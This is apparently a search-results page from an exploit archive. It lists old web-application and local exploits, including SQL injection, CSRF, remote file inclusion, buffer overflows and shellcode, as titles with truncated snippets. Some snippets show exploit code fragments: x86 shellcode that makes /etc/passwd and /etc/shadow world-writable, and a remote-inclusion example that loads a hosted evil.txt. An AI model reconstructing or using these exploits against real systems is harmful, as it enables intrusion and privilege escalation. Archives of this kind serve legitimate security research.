3100 matches found
Jurpopage 0.2.0 - SQL Injection
No description provided by source. ========================================================= Jurpopage SQL Injection ========================================================= Exploit Title : Jurpopage SQL Injection Date : 24 Noveber 2010 Author : Suddendeath [email protected] Platform/Test...
TheHostingTool 1.2.2 - Multiple CSRF Vulnerabilities
No description provided by source. !--- Title: TheHostingTool 1.2.2 Multiple CSRF Vulnerabilities Author: 10n1z3d 10n1z3datwdotcn Date: Mon 12 Jul 2010 01:19:52 PM EEST Vendor: http://thehostingtool.com/ Download: http://thehostingtool.googlecode.com/files/THT-v1.2.2.zip --- -= CSRF PoC 1 - Creat...
easysite 2.3 - Multiple Vulnerabilities
No description provided by source. + EasySite v2.3 Multiple Remote Vulnerabilities + Discovered By SirGod + www.mortal-team.org + Greetz : E.M.I.N.E.M, Ras ,Puscasmarin ,ToxicBlood,MesSiAH,xZu,HrN + Local File Inclusion...
TimeClock CSRF Remote Add Admin Exploit
No description provided by source...
Microsoft Windows 2000/NT 4 POSIX Subsystem Buffer Overflow Local Privilege Escalation Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/10710/info The Microsoft POSIX subsystem implementation is prone to a local buffer overflow vulnerability. A local attacker may exploit this vulnerability in order to run code with elevated privileges, fully compromising...
Cartweaver 2.16.11 Results.cfm category Parameter SQL Injection
No description provided by source. source: http://www.securityfocus.com/bid/17941/info Cartweaver ColdFusion is prone to SQL-injection vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input before using it in SQL queries. Successful exploits...
Invision Power Board <= 1.3.1 Login.PHP SQL Injection (working)
No description provided by source. ?php / = 1.3.1 Final /str0ke / $server = SERVER; $port = 80; $file = PATH; $target = 81; / User id and password used to fake-logon are not important. '10' is a random number. / $id = 10; $pass = ; $hex = 0123456789abcdef; for$i = 1; $i = 32; $i++ $idx = 0; $foun...
cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
No description provided by source...
PHPKIT <= 1.6.1R2 (search_user) Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl use IO::Socket; print q ----------------------------------------------- PHPKit 1.6.1 exploit by x23 phcn.ws geek-network.de use: phpkit161.pl server dir vicid sample: $ perl phpkit161.pl localhost /phpkit/ 1...
Stelian Pop dump 0.4 restore Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/1330/info A buffer overflow exists in the 'restore' program, part of the dump 0.4b15-1 package, distributed with RedHat Linux 6.2. By supplying a long string containing machine executable code at the prompt for a tape nam...
Sambar Server 4.x/5.0 Insecure Default Password Protection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/3095/info Sambar Server is a multi-threaded HTTP server for Microsoft Windows and Unix systems. Sambar Server provides insecure default protection for user passwords. The default password decryption algorithm employs only...
FunkBoard 0.66 prefs.php Multiple Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/14507/info FunkBoard is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage any of these issues t...
falcon cms 1.4.3 (rfi/xss) Multiple Vulnerabilities
No description provided by source. --------------------------------------------------------------- / | |\ \ / | / |/ | | |/ \ | | / \ \ | \ \ | | | \ | |/ \ | | // | || | ||| /| / /\ | |||| /| / / --------------------------------------------------------------- Http://www.inj3ct-it.org...
WINMOD 1.4 - (.lst) Universal Buffer Overflow Exploit (SEH) (2)
No description provided by source. !/usr/bin/python Exploit : WINMOD 1.4 .lst Universal Buffer Overflow Exploit SEH Tested on : Xp sp2 fr Original exploit : http://www.milw0rm.com/exploits/9221 By : DzGirl Greets to : hisok4 even if he doesn't know me & all friends win32exec - EXITFUNC=seh CMD=ca...
Reserve Logic 1.2 - Booking CMS Multiple Vulnerabilities
No description provided by source...
Linux x86 chmod 666 /etc/passwd & /etc/shadow - 57 bytes
No description provided by source. / Title: Linux x86 chmod 666 /etc/passwd & /etc/shadow - 57 bytes Author: Jean Pascal Pereira [email protected] Web: http://0xffe4.org Disassembly of section .text: 08048060 start: 8048060: 31 c0 xor %eax,%eax 8048062: 66 b9 b6 01 mov $0x1b6,%cx 8048066: 50 push...
Ossigeno CMS 2.2_pre1 upload/xax/ossigeno/admin/uninstall_module.php level Parameter Remote File Inclusion
No description provided by source...
vBulletin ImpEx <= 1.74 Remote Command Execution Exploit
No description provided by source. ?php / vbulletin ImpEx Remote File Inclusion Exploit c0ded by ReZEN Sh0uts: xorcrew.net, ajax, gml, subterrain, My gf url: http://www.xorcrew.net/ReZEN example: turl: http://www.target.com/impex/ImpExData.php?systempath= hurl:http://www.pwn3d.com/evil.txt? / $cm...
VirtueMart Joomla ECommerce Edition 1.0.11 Multiple Input Validation Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/20236/info VirtueMart Joomla eCommerce Edition is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker can exploit these issues to execute...
Cpanel - (lastvisit.html domain) Arbitrary File Disclosure Vulnerability (auth)
No description provided by source. +===================================================================================+ ./SEC-R1Z / / / / /\ \ |/ / \ \ / / / / | | / | | / / \ / / / / | || / | | / / \ \ \ \2009 | \ | | / / / \ /\ / ||\ \ ||/ \ R.I.P MichaelJackson !!!!!...